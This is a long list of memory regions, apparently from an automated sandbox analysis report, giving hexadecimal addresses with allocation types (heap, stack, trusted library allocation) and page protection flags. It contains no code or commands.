trusted library allocation
|
page read and write
|
||
3170000
|
heap
|
page execute and read and write
|
||
20568372000
|
trusted library allocation
|
page read and write
|
||
2B3B000
|
trusted library allocation
|
page read and write
|
||
1023000
|
heap
|
page read and write
|
||
143B000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
28D1000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
1AFBE000
|
stack
|
page read and write
|
||
E0A000
|
heap
|
page read and write
|
||
680000
|
trusted library allocation
|
page read and write
|
||
20568093000
|
trusted library allocation
|
page read and write
|
||
130A1000
|
trusted library allocation
|
page read and write
|
||
205682AD000
|
trusted library allocation
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
28E4E4D8000
|
trusted library allocation
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
2A2C92EA000
|
trusted library allocation
|
page read and write
|
||
1B14F18A000
|
heap
|
page read and write
|
||
1B4BE000
|
stack
|
page read and write
|
||
20690235000
|
trusted library allocation
|
page read and write
|
||
28E4F5EC000
|
trusted library allocation
|
page read and write
|
||
1B146ED9000
|
trusted library allocation
|
page read and write
|
||
1DB1A181000
|
trusted library allocation
|
page read and write
|
||
F00000
|
heap
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
6DD000
|
heap
|
page read and write
|
||
20568281000
|
trusted library allocation
|
page read and write
|
||
20558B20000
|
trusted library allocation
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
7FF848FE4000
|
trusted library allocation
|
page read and write
|
||
1DB19E30000
|
heap
|
page read and write
|
||
1B0B0000
|
heap
|
page execute and read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
DCF000
|
heap
|
page read and write
|
||
12A01000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1C0CE000
|
stack
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
205680DF000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
1B6EA000
|
heap
|
page read and write
|
||
7FF84904D000
|
trusted library allocation
|
page read and write
|
||
2A2B8C00000
|
heap
|
page execute and read and write
|
||
206EB3E0000
|
heap
|
page read and write
|
||
1B79F000
|
stack
|
page read and write
|
||
1AEB0000
|
heap
|
page read and write
|
||
1320000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
1400000
|
heap
|
page read and write
|
||
93B000
|
heap
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
6D5000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
206ECBD0000
|
heap
|
page read and write
|
||
206ED394000
|
heap
|
page read and write
|
||
1BB6E000
|
stack
|
page read and write
|
||
7EB000
|
heap
|
page read and write
|
||
2A2C9443000
|
trusted library allocation
|
page read and write
|
||
20568021000
|
trusted library allocation
|
page read and write
|
||
2A2C92BA000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
600000
|
heap
|
page read and write
|
||
2A2C9274000
|
trusted library allocation
|
page read and write
|
||
1B146C60000
|
trusted library allocation
|
page read and write
|
||
1B923000
|
stack
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
7FF84921F000
|
trusted library allocation
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849246000
|
trusted library allocation
|
page read and write
|
||
205681B1000
|
trusted library allocation
|
page read and write
|
||
1B146E74000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
20568227000
|
trusted library allocation
|
page read and write
|
||
28E66597000
|
heap
|
page execute and read and write
|
||
206ED336000
|
heap
|
page read and write
|
||
2A2B7072000
|
heap
|
page read and write
|
||
1A865000
|
heap
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
2A2847E000
|
stack
|
page read and write
|
||
1B53E000
|
stack
|
page read and write
|
||
1B3A3000
|
stack
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
2A2C91D9000
|
trusted library allocation
|
page read and write
|
||
C96A6BF000
|
stack
|
page read and write
|
||
1DB1B484000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
3229000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
2A2B70E9000
|
heap
|
page read and write
|
||
1DB182CC000
|
heap
|
page read and write
|
||
1B146F91000
|
trusted library allocation
|
page read and write
|
||
28E66560000
|
heap
|
page read and write
|
||
7FF848FA4000
|
trusted library allocation
|
page read and write
|
||
1BC6E000
|
stack
|
page read and write
|
||
2056805A000
|
trusted library allocation
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
205596B2000
|
trusted library allocation
|
page read and write
|
||
7FF848FB9000
|
trusted library allocation
|
page read and write
|
||
20568350000
|
trusted library allocation
|
page read and write
|
||
205682C5000
|
trusted library allocation
|
page read and write
|
||
2056816E000
|
trusted library allocation
|
page read and write
|
||
1B153000
|
stack
|
page read and write
|
||
1730000
|
heap
|
page execute and read and write
|
||
2A2C9164000
|
trusted library allocation
|
page read and write
|
||
20567FEF000
|
trusted library allocation
|
page read and write
|
||
D16000
|
stack
|
page read and write
|
||
2A2C905E000
|
trusted library allocation
|
page read and write
|
||
1B3B3000
|
stack
|
page read and write
|
||
7F0000
|
trusted library allocation
|
page read and write
|
||
28E4C544000
|
heap
|
page read and write
|
||
12C21000
|
trusted library allocation
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
2A2BA19F000
|
trusted library allocation
|
page read and write
|
||
2A2BA81F000
|
trusted library allocation
|
page read and write
|
||
1B583000
|
stack
|
page read and write
|
||
1B38E000
|
stack
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
1B45E000
|
stack
|
page read and write
|
||
2611000
|
trusted library allocation
|
page read and write
|
||
205680EA000
|
trusted library allocation
|
page read and write
|
||
1AA6D000
|
stack
|
page read and write
|
||
206902A3000
|
trusted library allocation
|
page read and write
|
||
128B5000
|
trusted library allocation
|
page read and write
|
||
1B146FE7000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
2A2B7300000
|
trusted library allocation
|
page read and write
|
||
1A590000
|
trusted library allocation
|
page read and write
|
||
7DF4447F0000
|
trusted library allocation
|
page execute and read and write
|
||
ACA000
|
heap
|
page read and write
|
||
20690339000
|
trusted library allocation
|
page read and write
|
||
F9B000
|
heap
|
page read and write
|
||
1DB18505000
|
heap
|
page read and write
|
||
2BBD000
|
trusted library allocation
|
page read and write
|
||
9D6000
|
heap
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
206902AB000
|
trusted library allocation
|
page read and write
|
||
2056803E000
|
trusted library allocation
|
page read and write
|
||
2AD1000
|
trusted library allocation
|
page read and write
|
||
2068194F000
|
trusted library allocation
|
page read and write
|
||
206EB252000
|
heap
|
page read and write
|
||
1DB182DA000
|
heap
|
page read and write
|
||
206903F8000
|
trusted library allocation
|
page read and write
|
||
1DB3260F000
|
heap
|
page read and write
|
||
1B883000
|
stack
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
206ED640000
|
heap
|
page read and write
|
||
322E000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1C810000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
1B840000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
20568165000
|
trusted library allocation
|
page read and write
|
||
20690205000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
7FF849172000
|
trusted library allocation
|
page read and write
|
||
1B09E000
|
stack
|
page read and write
|
||
1B1470A5000
|
trusted library allocation
|
page read and write
|
||
206903A6000
|
trusted library allocation
|
page read and write
|
||
1B1384E0000
|
trusted library allocation
|
page read and write
|
||
20568265000
|
trusted library allocation
|
page read and write
|
||
20559821000
|
trusted library allocation
|
page read and write
|
||
1BD4F000
|
stack
|
page read and write
|
||
C45000
|
heap
|
page read and write
|
||
BB6000
|
heap
|
page read and write
|
||
7FF848F94000
|
trusted library allocation
|
page read and write
|
||
2A2C932B000
|
trusted library allocation
|
page read and write
|
||
9E8F73F000
|
stack
|
page read and write
|
||
F93000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1B134E17000
|
heap
|
page read and write
|
||
B45000
|
heap
|
page read and write
|
||
2A2D1610000
|
heap
|
page read and write
|
||
1AE90000
|
heap
|
page execute and read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9440000
|
trusted library allocation
|
page read and write
|
||
1513000
|
heap
|
page read and write
|
||
1B146FC4000
|
trusted library allocation
|
page read and write
|
||
BB0000
|
heap
|
page read and write
|
||
2A2D0F9F000
|
heap
|
page read and write
|
||
28E4F020000
|
trusted library allocation
|
page read and write
|
||
1BAFE000
|
stack
|
page read and write
|
||
1DB1BFA6000
|
trusted library allocation
|
page read and write
|
||
1B1BE000
|
stack
|
page read and write
|
||
2A2C91C4000
|
trusted library allocation
|
page read and write
|
There are 3300 hidden memdumps, click here to show them.